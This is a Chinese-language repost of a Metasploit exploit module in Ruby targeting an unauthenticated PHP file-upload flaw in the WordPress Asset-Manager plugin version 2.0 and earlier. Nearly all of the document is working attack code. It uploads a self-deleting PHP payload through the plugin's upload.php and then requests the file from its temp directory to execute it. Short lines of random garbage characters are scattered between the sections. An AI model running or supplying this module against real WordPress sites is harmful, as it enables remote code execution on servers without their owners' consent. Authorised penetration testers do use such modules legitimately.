这个模块是一个 Metasploit 模块，利用在 WordPress 的 Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该插件允许上传 php 文件：用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
% J! g) w' q- R1 u2 r% Y1 u' A# Z- F" T; p7 ~3 W
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
& l" i0 L) y9 A6 c8 R " m, |: j# \) r" |
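# Framework core plus the PhpEXE mixin that provides get_write_exec_payload.
require 'msf/core'
require 'msf/core/exploit/php_exe'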
/ b$ [9 X) [0 Z" T8 }
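class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Module metadata: name, description, authors, references, payload and
  # target definitions, plus the single TARGETURI option.
  #
  # @param info [Hash] module info that the framework merges via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Posts the PHP payload as a multipart upload to the plugin's upload.php
  # handler, then requests the stored file from the plugin's temp directory.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the upload response is
  #   not a 200 whose body contains the chosen file name, or when the
  #   execution request returns an explicit non-200 status
  def exploit
    # Build the base path on a new string rather than appending to the one
    # returned by target_uri, so no framework-owned object is mutated.
    uri = target_uri.path
    uri += '/' unless uri.end_with?('/')
    peer = "#{rhost}:#{rport}"

    payload_name = "#{rand_text_alpha(5)}.php"
    # :unlink_self is passed through to PhpEXE; presumably it makes the
    # dropped file delete itself once it has run — confirm in php_exe.rb.
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Single multipart part, nil transfer encoding, sent as form field "Filedata".
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Strip the CRLF that precedes each "--_Part_" boundary line in Rex's output.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Success is judged by the file name appearing in the response body.
    # A substring check is used instead of an interpolated regex so the '.'
    # in the file name is not treated as a wildcard; to_s guards a nil body.
    unless res && res.code == 200 && res.body.to_s.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    # A nil response is deliberately not an error here (the original module
    # tolerated it, presumably because the payload may never reply); only an
    # explicit non-200 status is reported as a failure.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end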
' E9 o- |' i; _8 @0 W |